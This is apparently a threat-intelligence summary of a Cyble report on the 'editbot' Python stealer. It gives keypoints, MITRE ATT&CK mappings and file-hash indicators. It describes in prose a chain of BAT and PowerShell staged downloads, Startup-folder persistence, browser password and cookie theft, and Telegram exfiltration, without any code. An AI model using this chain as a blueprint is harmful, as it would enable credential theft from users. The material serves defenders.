Cyble researchers uncovered a multi-stage social-media scam campaign that culminates in a Windows-based Python stealer named editbot, with payloads fetched from open-source platforms. The attacker flow includes persistence, staged downloads, and exfiltration of browser data via Telegram, targeting social-media users and their browsers. #editbot #Cyble #CRIL #GitLab #Telegram
Keypoints
- CRIL found a minimally detectable WinRAR archive on VirusTotal linked to a campaign targeting Social Media users.
- The campaign employs a multi-stage infection chain with distinct roles (evasion, payload download, persistence).
- Threat actors retrieve the next-stage payloads from open-source platforms like GitLab.
- The downloaded payload is a Python-based stealer named “editbot” that steals passwords, cookies, web data, and other details, exfiltrating via a Telegram bot.
- The first-stage BAT file uses PowerShell to download and drop further components, including a Startup-located BAT for persistence.
- The attack chain culminates in collecting browser data (Chrome, Firefox, Edge, Chromium-based) and sending it to attackers via Telegram.
MITRE Techniques
- [T1566] Phishing – Reach users via phishing sites. ‘This stealer could reach users via phishing sites.’
- [T1059.001] PowerShell – Used to download and execute the stealer. ‘PowerShell commands are used to perform various download activities in the system.’
- [T1057] Process Discovery – Enumerates running processes. ‘The stealer captures all the running process.’
- [T1547.001] Startup Folder – Persistence by placing items in the startup folder. ‘The BAT file “WindowsSecure.bat” serves the purpose of ensuring persistence. It is designed to execute the Python stealer that will be downloaded at a later stage, specifically located at “C:UsersPublicDocumentlibb1.py” every time the system starts.’
- [T1005] Data from Local System – Collects sensitive data from the victim’s system. ‘The final payload is a Windows-specific Python-based stealer designed to collect various sensitive information, such as passwords, cookies, web data, active system processes, etc.’
- [T1539] Steal Web Session Cookie – Extracts cookies from browsers. ‘The stealer connects to the SQLite database file named “Cookies,” which contains cookie information from various web browsers.’
- [T1555] Credentials from Password Stores – Dec decrypts passwords from browser stores. ‘decrypts the passwords, and saves the URL, username, and decrypted password into a newly created text file named “pass.txt.”’
- [T1567] Exfiltration Over Web Service – Transfers data via a web service. ‘Uses Telegram channel to exfiltrate data’
Indicators of Compromise
- [File Hash] Screenshot-Product-Photo-Sample_25929.rar – fd8391a1a0115880e8c3ee2e76fbce741f1b3c5fbcb728b9fac37c21e9f6d7b7, feff390b99dfe7619a20748582279bc13c04f52a, and 1 more hash
- [File Hash] Screenshot Product Photo Sample.bat – d13aba752f86757de6628e833f4fdf4c625f480056e93b919172e9c309448b80, 18e96d94089086848a0569a1e1d8051da0f6f444, and 1 more hash
- [File Hash] Python stealer (libb1.py) – 3f7bd47fbbf1fb0a63ba955c8f9139d6500b6737e5baf5fdb783f0cedae94d6d, eed59a282588778ffbc772085b03d229a5d99e35, and 1 more hash
- [File Hash] product-_img_2023-12_86-13a30f_13373.rar – 9d048e99bed4ced4f37d91a29763257a1592adb2bc8e17a66fa07a922a0537d0, 93d70f02b2ee2c4c2cd8262011ed21317c7d92de, and 1 more hash
- [File Hash] image – photo_product _2023-12_86-13a30ff503fd6638c5863dta.bat – bc3993769a5f82e454acef92dc2362c43bf7d6b6b203db7db8803faa996229aa, cf019e96e16fdaa504b29075aded36be27691956, and 1 more hash
Read more: https://cyble.com/blog/new-editbot-stealer-spreads-via-social-media-messages/